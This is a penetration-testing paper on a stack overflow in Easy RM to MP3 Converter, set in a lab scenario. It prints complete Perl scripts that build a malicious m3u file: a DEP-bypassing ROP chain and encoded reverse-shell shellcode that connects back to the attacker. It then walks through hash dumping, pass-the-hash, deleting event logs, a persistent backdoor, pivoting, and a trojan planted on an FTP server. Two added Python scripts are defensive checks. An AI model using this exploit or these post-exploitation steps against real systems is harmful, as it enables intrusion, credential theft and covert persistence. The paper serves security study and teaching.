Penetration Testing for Easy RM to MP3 Converter Application and Post Exploit

Date post: 25-Dec-2014
Upload: jongwon-kim
Page 1: Penetration Testing for Easy RM to MP3 Converter Application and Post Exploit

http://dikien2012.blogspot.com

1

Penetration Testing for Easy RM to MP3 Converter Application & Post Exploit

Author: JongWon Kim
[email protected]


Table of Contents

Penetration Testing for Easy RM to MP3 Converter Application ... 1
Table of Contents ... 2
Abstract ... 3
Setting up the Testing Environment ... 4
Strategy for the Application Testing ... 5
Dynamic Analysis ... 6
Strategy for the Post Exploit ... 15
Post Exploit ... 16
Conclusion ... 21


Abstract

Advanced persistent attacks now threaten our valuable assets. New exploits that threaten end-point users and corporations are researched day by day. No matter how well operating system protection mechanisms work, privilege escalation can be easy simply because of one vulnerable application. Many corporations defend their information with firewalls, WAFs and SLBs, but a single vulnerable application can render these powerful protection lines useless. In this paper, I analyze this application and suggest a solution within a Windows environment.

This paper uses an imaginary scenario. My client reports that 'Easy RM to MP3 Converter' sometimes exits when opening an m3u file that contains an overly long string. First, I find that this application has a stack-based buffer overflow vulnerability and build a ROP-based exploit to test it. Second, I attack the machine running the application with the exploit and carry out post-exploitation.


Setting up the Testing Environment

- BackTrack 5 R1 (attack machine, 192.168.10.10)
- Windows SP2 (first victim, for the application penetration testing, 192.168.10.5, 10.10.10.5)
- Windows SP3 (second victim, for the pivot, 10.10.10.20)
- Immunity Debugger 1.83
- Easy RM to MP3 Converter (2.7.3.700, vulnerable application)
- Metasploit Framework
- Social Engineering Toolkit
- ALFTP 5.22

Testing Environment Explanation:

The default DEP (Data Execution Prevention) setting for Windows SP2 is OptIn (all programs, processes and services on the Windows system are protected, except for processes in the exception list). Before starting the penetration test, I manually changed it to OptOut by adding '/noexecute=policy' to the end of the line that refers to the OS boot configuration. With the OptOut option, all programs, processes and services on the Windows system are protected, except for processes in the exception list. There is no exception list for this testing.


Strategy for the Application Testing

I use the Windows API function VirtualProtect() to bypass DEP. This function changes the access protection of a given memory page, which lets me make the location where my payload resides executable. I first have to set up the stack with the correct parameters for that function. I cannot simply overwrite the return address with the address of my payload, or use SEH chains, because with DEP set to OptOut the payload on the stack will not be executed.

Below is the prototype of VirtualProtect():

BOOL WINAPI VirtualProtect(
    __in  LPVOID lpAddress,
    __in  SIZE_T dwSize,
    __in  DWORD  flNewProtect,
    __out PDWORD lpflOldProtect
);

Return address: the address VirtualProtect() returns to, i.e. a pointer to the location of the payload on the stack.

lpAddress: a pointer to the starting page of the region of pages whose access protection attributes are to be changed.

dwSize: the size of the region whose access protection attributes are to be changed, in bytes.

flNewProtect: the option that specifies the new protection; 0x00000040 is PAGE_EXECUTE_READWRITE.

lpflOldProtect: a pointer to a variable that will receive the previous access protection value.


Dynamic Analysis

First, I calculate the offset between the registers and the buffer with a Perl script that creates a malicious m3u file, then run the application under the debugger and open that m3u file. Below is the source code that creates the m3u file.

==================================================================
use strict;
use warnings;

my $file = "exploit.m3u";
my $junk = "\x41" x 26058;
$junk = $junk . "XXXX";
my $eip = "BBBB"; # This will overwrite EIP.
my $nops = "\x90" x 240;
my $shellcode = "";
my $rest = "C" x 300;
my $payload = $junk.$eip.$nops.$shellcode.$rest;
print "Payload size : ".length($payload)."\n";
print "Shellcode size : ".length($shellcode)."\n";
open(my $FILE, '>', $file) or die "Cannot open $file: $!";
binmode($FILE); # write raw bytes, no newline translation on Windows
print $FILE $payload;
close($FILE);
print "m3u File Created successfully\n";
==================================================================

[ Figure 1. EIP is overwritten with BBBB ]
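From the defender's side, the trigger described above (a single playlist entry of about 26,000 bytes, far longer than any legitimate path) is easy to screen for before such a file ever reaches the converter, for example on a mail or file-transfer gateway. The following Python check is an added example, not part of the original paper; the 260-character ceiling (Windows MAX_PATH) and the sample playlists are assumptions.

```python
"""Screen m3u playlists for lines no real media path could need.

Added example (not from the original paper). The crash in the paper is
triggered by one playlist entry of ~26,000 bytes; a legitimate entry is a
path or URL, so anything beyond a MAX_PATH-sized line is suspect.
"""

MAX_LINE_LEN = 260  # assumption: Windows MAX_PATH as a generous ceiling


def check_m3u(data: bytes, max_len: int = MAX_LINE_LEN) -> list:
    """Return a list of (line_number, reason) findings; an empty list means clean."""
    findings = []
    # Decode leniently: a crafted file may hold bytes that are not valid UTF-8,
    # and those show up as U+FFFD after decoding.
    text = data.decode("utf-8", errors="replace")
    for lineno, line in enumerate(text.splitlines(), start=1):
        if not line:
            continue
        # Directives (#EXTM3U, #EXTINF) are length-checked too; only blanks are skipped.
        if len(line) > max_len:
            findings.append((lineno, f"line length {len(line)} exceeds {max_len}"))
        # Control characters or undecodable bytes never belong in a playlist line
        # (non-ASCII letters such as a Korean folder name are still printable).
        if "\ufffd" in line or any(not ch.isprintable() for ch in line):
            findings.append((lineno, "undecodable or control bytes in line"))
    return findings


def is_safe_m3u(data: bytes) -> bool:
    """True when the playlist has no oversized or binary lines."""
    return not check_m3u(data)


# Constructed sample inputs (not from the paper).
BENIGN = b"#EXTM3U\r\n#EXTINF:123,Song\r\nC:\\Music\\song.rm\r\n"
# Shape of the paper's exploit.m3u: one line of filler, EIP marker, NOPs and tail.
CRAFTED = b"A" * 26058 + b"XXXX" + b"BBBB" + b"\x90" * 240 + b"C" * 300

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN), ("crafted", CRAFTED)):
        print(name, "->", check_m3u(blob) or "clean")
```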


42424242 is the hexadecimal representation of BBBB. Another way to find the offset is mona.py, run from the debugger command line with '!mona pattern_create 3000'. I add this unique pattern to the script.

==================================================================
use strict;
use warnings;

my $file = "exploit.m3u";
my $junk = "\x41" x 26000;
my $pattern = ""; # msf unique pattern goes here
my $nops = "\x90" x 240;
my $shellcode = "";
my $rest = "C" x 300;
my $payload = $junk.$pattern.$nops.$shellcode.$rest;
print "Payload size : ".length($payload)."\n";
print "Shellcode size : ".length($shellcode)."\n";
open(my $FILE, '>', $file) or die "Cannot open $file: $!";
binmode($FILE); # write raw bytes, no newline translation on Windows
print $FILE $payload;
close($FILE);
print "m3u File Created successfully\n";
==================================================================

After the crash, I get more useful information with the command '!mona suggest'. On top of that, I check whether the payload is corrupted with the command '!mona compare -f "C:\Documents and Settings\Administrator\바탕 화면\RM2MP3Converter\pattern.txt"'. I generate gadgets to build the ROP chain with the command '!mona rop -n -cm aslr=false,safeseh=false,rebase=false'. Once the ROP chain has done its work, EIP will point to the shellcode that I want executed. I generated the shellcode with msfpayload and msfencode and added it to the script to make the final exploit m3u file.
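The mona command above deliberately selects gadgets only from modules that are not ASLR-enabled, not rebased and not SafeSEH-compiled, so one defensive counterpart is to audit which DLLs an application ships without those mitigations. The following Python script is an added example, not part of the original paper: it reads the DllCharacteristics field of a PE optional header and reports whether DYNAMIC_BASE (ASLR) and NX_COMPAT (DEP opt-in) are set. The minimal PE images it checks are constructed inline; SafeSEH lives in the load config directory and is not parsed here.

```python
"""Report ASLR/DEP opt-in flags from a PE image's optional header.

Added example (not part of the original paper). A ROP chain like the one in
this paper needs modules at fixed addresses; DYNAMIC_BASE marks modules that
ASLR may relocate and NX_COMPAT marks images that opt in to DEP. Field
offsets follow the PE/COFF specification.
"""
import struct

IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040
IMAGE_DLLCHARACTERISTICS_NX_COMPAT = 0x0100
IMAGE_DLLCHARACTERISTICS_NO_SEH = 0x0400


def pe_mitigations(image: bytes) -> dict:
    """Parse the headers of a PE image (as bytes) and return its mitigation flags."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ image")
    (pe_off,) = struct.unpack_from("<I", image, 0x3C)          # e_lfanew
    if image[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    opt_off = pe_off + 4 + 20                                    # skip the 20-byte COFF header
    (magic,) = struct.unpack_from("<H", image, opt_off)
    if magic not in (0x10B, 0x20B):                              # PE32 / PE32+
        raise ValueError("unknown optional header magic 0x%x" % magic)
    # DllCharacteristics sits at offset 70 in both PE32 and PE32+ optional headers.
    (dll_chars,) = struct.unpack_from("<H", image, opt_off + 70)
    aslr = bool(dll_chars & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE)
    return {
        "aslr": aslr,
        "nx_compat": bool(dll_chars & IMAGE_DLLCHARACTERISTICS_NX_COMPAT),
        "no_seh": bool(dll_chars & IMAGE_DLLCHARACTERISTICS_NO_SEH),
        "fixed_base": not aslr,  # loads at a predictable address: usable as a gadget source
    }


def build_min_pe(dll_chars: int) -> bytes:
    """Constructed minimal PE32 header (headers only, no sections) for testing."""
    pe_off = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", pe_off)   # e_lfanew at 0x3C
    # Machine=i386, 0 sections, no timestamp/symbols, 224-byte optional header, DLL flags
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 224, 0x2102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                        # PE32 magic
    struct.pack_into("<H", opt, 70, dll_chars)                   # DllCharacteristics
    return dos + b"PE\0\0" + coff + bytes(opt)


# Constructed samples: a hardened image, and one built without ASLR/DEP flags,
# like the fixed-base modules the chain in this paper draws its gadgets from.
HARDENED = build_min_pe(IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE | IMAGE_DLLCHARACTERISTICS_NX_COMPAT)
LEGACY = build_min_pe(0)

if __name__ == "__main__":
    for name, img in (("hardened", HARDENED), ("legacy", LEGACY)):
        print(name, pe_mitigations(img))
```

On the Windows SP2/SP3 targets in this paper there is no ASLR at all, whatever the flag says; on Vista and later the same check tells you which third-party modules would still load at a fixed base.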

[ Figure 2. Making a Payload to connect back to attacker machine ]

My final exploit is below.

Stage-1: save the stack pointer into the EAX and EDI registers and jump over the parameters.

Stage-2: craft the parameters, i.e. set up the arguments of a function that allows me to disable or bypass DEP.


==================================================================
my $file = "exploit.m3u";
my $junk = "\x41" x 26064;
my $eip = pack('V',0x7C84483D); # RETN from kernel32.dll
my $junk2 = "AAAA"; # Compensate for
########### Stage-1 Started here ###########
########### Put stack pointer in EDI & EAX ###########
my $rop = pack('V',0x5a489ee7); # PUSH ESP//MOV EAX,EDX//POP EDI//RETN from uxtheme.dll
$rop = $rop.pack('V',0x77bce842); # PUSH EDI//POP EAX//POP EBP//RETN from msvcrt.dll
$rop = $rop."AAAA"; # Compensate for
$rop = $rop.pack('V',0x1001653D); # ADD ESP,20//RETN from MSRMfilter03.dll
########### Parameters for VirtualProtect() ###########
my $parameters = pack('V',0x7C801AD0); # Address of VirtualProtect()
$parameters = $parameters."WWWW"; # Return address
$parameters = $parameters."XXXX"; # lpAddress
$parameters = $parameters."YYYY"; # Size
$parameters = $parameters."ZZZZ"; # flNewProtect
$parameters = $parameters.pack('V',0x10035005); # Writeable address
$parameters = $parameters.("H" x 8); # Padding
########### Stage-1 finished ###########
########### Stage-2 starts below ###########
########### First Parameter ############
my $rop2 = pack('V',0x77427175); # XCHG EDI,ESI//RETN 8


########### Make EAX point at the shellcode ###########
$rop2 = $rop2.pack('V',0x1002DC4C); # ADD EAX,100//POP EBP//RETN from MSRMfilter03.dll
$rop2 = $rop2."AAAA"; # Padding - Compensate for RETN 8
$rop2 = $rop2."AAAA";
$rop2 = $rop2."AAAA";
########### Second Parameter, RETN is in EAX ############
$rop2 = $rop2.pack('V',0x77D944C4); # MOV DWORD PTR DS:[ESI+10],EAX//MOV EAX,ESI//POP ESI//RETN
$rop2 = $rop2."AAAA"; # Padding
########## EAX now contains Stack Pointer #############
$rop2 = $rop2.pack('V',0x76A602BC); # PUSH EAX//POP ESI//RETN
########## Make EAX point at Shellcode again ###########
$rop2 = $rop2.pack('V',0x1002DC4C); # ADD EAX,100//POP EBP//RETN
$rop2 = $rop2."AAAA"; # Padding
########## Increase ESI with 4 #############
$rop2 = $rop2.pack('V',0x5C83F948); # INC ESI//RETN from comctl32
$rop2 = $rop2.pack('V',0x5C83F948);
$rop2 = $rop2.pack('V',0x5C83F948);
$rop2 = $rop2.pack('V',0x5C83F948);
########## Write lpAddress ############
$rop2 = $rop2.pack('V',0x77D944C4); # MOV DWORD PTR DS:[ESI+10],EAX//MOV EAX,ESI
$rop2 = $rop2."AAAA"; # Padding


########## Save EAX in ESI again ##########
$rop2 = $rop2.pack('V',0x76A602BC); # PUSH EAX//POP ESI//RETN
########## Create Size: Set EAX to 300 or so ##########
$rop2 = $rop2.pack('V',0x76A5D8EC); # XOR EAX,EAX//RETN
$rop2 = $rop2.pack('V',0x1002DC4C); # ADD EAX,100//POP EBP//RETN
$rop2 = $rop2."AAAA"; # Padding
$rop2 = $rop2.pack('V',0x1002DC4C); # ADD EAX,100//POP EBP//RETN
$rop2 = $rop2."AAAA"; # Padding
$rop2 = $rop2.pack('V',0x1002DC4C); # ADD EAX,100//POP EBP//RETN
$rop2 = $rop2."AAAA"; # Padding
########## Write Size: First Set ESI to the Right Place ##########
$rop2 = $rop2.pack('V',0x5C83F948); # INC ESI//RETN from comctl32
$rop2 = $rop2.pack('V',0x5C83F948);
$rop2 = $rop2.pack('V',0x5C83F948);
$rop2 = $rop2.pack('V',0x5C83F948);
########## 3rd Parameter ##########
$rop2 = $rop2.pack('V',0x77D944C4); # MOV DWORD PTR DS:[ESI+10],EAX//MOV EAX,ESI
$rop2 = $rop2."AAAA"; # Padding
########## Save EAX in ESI again ##########
$rop2 = $rop2.pack('V',0x76A602BC); # PUSH EAX//POP ESI//RETN
########## flNewProtect 0x40 ##########
$rop2 = $rop2.pack('V',0x76A5D8EC); # XOR EAX,EAX//RETN
$rop2 = $rop2.pack('V',0x1002DC41); # ADD EAX,40//POP EBP//RETN


$rop2 = $rop2."AAAA"; # Padding
$rop2 = $rop2.pack('V',0x5C83F948); # INC ESI//RETN from comctl32
$rop2 = $rop2.pack('V',0x5C83F948); # INC ESI//RETN from comctl32
$rop2 = $rop2.pack('V',0x5C83F948); # INC ESI//RETN from comctl32
$rop2 = $rop2.pack('V',0x5C83F948); # INC ESI//RETN from comctl32
########## 4th Parameter ##########
$rop2 = $rop2.pack('V',0x77D944C4); # MOV DWORD PTR DS:[ESI+10],EAX//MOV EAX,ESI//RETN
$rop2 = $rop2."AAAA"; # Padding
########## Return to VirtualProtect pointer, Compensate for 2 POP instructions ##########
$rop2 = $rop2.pack('V',0x76A6028F); # SUB EAX,4//RETN
$rop2 = $rop2.pack('V',0x76A6028F); # SUB EAX,4//RETN
########## Change ESP & Back to the origin ##########
$rop2 = $rop2.pack('V',0x73D35CA8); # PUSH EAX//POP ESP//MOV EAX,EDI//POP EDI//POP ESI//RETN from MFC32.dll
my $nops = "\x90" x 240;

$shellcode = "\x89\xe0\xd9\xf6\xd9\x70\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x4a" .

"\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37\x52\x59" .

"\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41" .

"\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42" .

"\x75\x4a\x49\x49\x6c\x49\x78\x6b\x39\x43\x30\x75\x50\x53" .

"\x30\x73\x50\x4e\x69\x4d\x35\x44\x71\x6e\x32\x62\x44\x6c" .

"\x4b\x62\x72\x30\x30\x4c\x4b\x46\x32\x56\x6c\x6e\x6b\x30" .

"\x52\x75\x44\x6e\x6b\x61\x62\x56\x48\x74\x4f\x4d\x67\x42" .

"\x6a\x65\x76\x30\x31\x49\x6f\x66\x51\x79\x50\x6c\x6c\x75" .


"\x6c\x45\x31\x53\x4c\x35\x52\x56\x4c\x71\x30\x59\x51\x48" .

"\x4f\x54\x4d\x37\x71\x7a\x67\x6d\x32\x5a\x50\x76\x32\x66" .

"\x37\x4e\x6b\x56\x32\x44\x50\x6e\x6b\x37\x32\x37\x4c\x55" .

"\x51\x5a\x70\x4c\x4b\x63\x70\x30\x78\x6f\x75\x39\x50\x32" .

"\x54\x62\x6a\x47\x71\x48\x50\x30\x50\x6e\x6b\x73\x78\x55" .

"\x48\x4e\x6b\x46\x38\x57\x50\x55\x51\x6e\x33\x59\x73\x47" .

"\x4c\x42\x69\x4e\x6b\x75\x64\x4c\x4b\x33\x31\x4b\x66\x55" .

"\x61\x4b\x4f\x55\x61\x79\x50\x4e\x4c\x59\x51\x7a\x6f\x54" .

"\x4d\x55\x51\x6a\x67\x66\x58\x49\x70\x30\x75\x58\x74\x65" .

"\x53\x31\x6d\x5a\x58\x37\x4b\x63\x4d\x46\x44\x73\x45\x39" .

"\x72\x31\x48\x4e\x6b\x76\x38\x77\x54\x65\x51\x59\x43\x42" .

"\x46\x4e\x6b\x56\x6c\x50\x4b\x4e\x6b\x31\x48\x45\x4c\x43" .

"\x31\x79\x43\x6c\x4b\x45\x54\x4e\x6b\x77\x71\x4e\x30\x4c" .

"\x49\x43\x74\x54\x64\x65\x74\x61\x4b\x71\x4b\x73\x51\x70" .

"\x59\x52\x7a\x66\x31\x69\x6f\x49\x70\x62\x78\x33\x6f\x61" .

"\x4a\x6c\x4b\x45\x42\x4a\x4b\x4b\x36\x61\x4d\x71\x78\x76" .

"\x53\x54\x72\x45\x50\x57\x70\x75\x38\x52\x57\x33\x43\x66" .

"\x52\x73\x6f\x63\x64\x42\x48\x30\x4c\x52\x57\x66\x46\x57" .

"\x77\x4b\x4f\x78\x55\x4c\x78\x4e\x70\x65\x51\x75\x50\x67" .

"\x70\x71\x39\x38\x44\x71\x44\x70\x50\x70\x68\x51\x39\x6b" .

"\x30\x50\x6b\x77\x70\x59\x6f\x38\x55\x42\x70\x52\x70\x46" .

"\x30\x62\x70\x67\x30\x66\x30\x61\x50\x70\x50\x42\x48\x7a" .

"\x4a\x44\x4f\x79\x4f\x39\x70\x4b\x4f\x58\x55\x4a\x37\x43" .

"\x5a\x67\x75\x65\x38\x69\x50\x4d\x78\x35\x5a\x37\x7a\x35" .

"\x38\x35\x52\x33\x30\x56\x71\x51\x4c\x4d\x59\x38\x66\x51" .

"\x7a\x54\x50\x62\x76\x66\x37\x35\x38\x4e\x79\x49\x35\x74" .

"\x34\x71\x71\x69\x6f\x6a\x75\x4f\x75\x6b\x70\x42\x54\x56" .

"\x6c\x49\x6f\x62\x6e\x74\x48\x63\x45\x7a\x4c\x32\x48\x6c" .

"\x30\x6f\x45\x4e\x42\x63\x66\x49\x6f\x68\x55\x61\x7a\x47" .


"\x70\x61\x7a\x34\x44\x50\x56\x36\x37\x75\x38\x63\x32\x4b" .

"\x69\x69\x58\x73\x6f\x49\x6f\x39\x45\x4e\x6b\x57\x46\x31" .

"\x7a\x47\x30\x33\x58\x55\x50\x44\x50\x47\x70\x73\x30\x32" .

"\x76\x62\x4a\x65\x50\x32\x48\x66\x38\x69\x34\x61\x43\x59" .

"\x75\x69\x6f\x68\x55\x5a\x33\x56\x33\x61\x7a\x55\x50\x61" .

"\x46\x32\x73\x50\x57\x30\x68\x66\x62\x68\x59\x48\x48\x53" .

"\x6f\x6b\x4f\x39\x45\x47\x71\x48\x43\x57\x59\x58\x46\x4e" .

"\x65\x4c\x36\x30\x75\x68\x6c\x6f\x33\x41\x41";

my $rest = "C" x 300;
my $payload = $junk.$eip.$junk2.$rop.$parameters.$rop2.$nops.$shellcode.$rest;
print "Payload size : ".length($payload)."\n";
print "Shellcode size : ".length($shellcode)."\n";
open(my $FILE, '>', $file) or die "Cannot open $file: $!";
binmode($FILE); # write raw bytes, no newline translation on Windows
print $FILE $payload;
close($FILE);
print "m3u File Created successfully\n";
==================================================================

Since the shellcode connects back to the BackTrack machine, I use multi/handler in msfconsole to listen on TCP port 4444.

[ Figure 3. Listening on 4444 tcp port ]


I create the m3u file with the script above and open it with the application.

[ Figure 4. Open the exploit.m3u to crash the application ]

I get a Meterpreter shell from the first victim machine.

[ Figure 5. Get the Meterpreter shell from the first Victim Machine ]


Strategy for the Post Exploit

1. Understanding the Victim better

2. Privilege Escalation

3. Deleting Logs and Killing Monitoring software

4. Collecting Data, and Executing programs

5. Backdoors and Rootkits

6. Using victims as a Pivot to hack deeper into the network


Post Exploit

1. Understanding the Victim better

[ Figure 5. Network Information ]

I retrieve the password hashes and can crack them with John the Ripper. If I cannot recover the original passwords, I can use the pass-the-hash technique, which requires only the password hash, not the password itself.

[ Figure 6. Password Hashes ]

I can also look for more vulnerable applications, available tokens and the routing table.

[ Figure 7. Token Lists ]


[ Figure 8. Running applications ]

[ Figure 9. Routing Table ]

I notice this machine is running ALFTP; it will be used in the social engineering attack.

[ Figure 10. ALFTP is running ]

2. Privilege Escalation

After getting SYSTEM, I safely migrate into PID 1072 (svchost.exe) via technique 1.

[ Figure 11. Privilege Escalation Success ]


3. Deleting Logs and Killing Monitoring software

I try to kill antivirus software, but there is none, and I delete the event logs.

[ Figure 12. Killing AV and deleting event logs ]

4. Collecting Data, and Executing programs

[ Figure 13. Collecting txt files ]

5. Backdoors and Rootkits

I run persistence, telling Windows to auto-start the agent at boot time, wait 100 seconds between connection retries, and connect to IP 192.168.10.5 on port 443.

[ Figure 14. Installing the Backdoor ]


6. Using victims as a Pivot to hack deeper into the network

I found that the first victim machine has two network cards on different subnets; the second subnet is an inner network disconnected from the outside. I go inside using the first victim machine as a tunnel.

[ Figure 15. Setting routing table ]

[ Figure 16. Running scan via session 1 ]

I notice the second victim machine (10.10.10.20) has port 139 open, which means it could be vulnerable to 'MS08-067'.

[ Figure 17. Port Scan ]

I make a malicious file with a fake name (alsong.exe) that connects back to the attacker machine with a Meterpreter shell. I find the working directory of the FTP server on the first victim machine and upload the file there.

[ Figure 18. Uploading the malicious file ]


I check that the malicious file is on the FTP server. The second victim downloads and executes it.

[ Figure 19. Uploading the malicious file ]

A new session is created from the second victim machine.

[ Figure 20. Attack Success on second Victim machine ]


Conclusion

I have shown that a vulnerable application can threaten the inner intranet. The latest OS protection mechanisms, firewalls and SLBs cannot always protect our assets. It is vital not only that developers practice secure coding to prevent attacks such as buffer overflows or heap spraying, but also that end-point users are security conscious: they should not use applications they do not need for work, and should always keep their software updated. It is obvious that essential databases should be kept completely away from normal staff. As is frequently pointed out, we should keep in mind that attacks can come from inside.

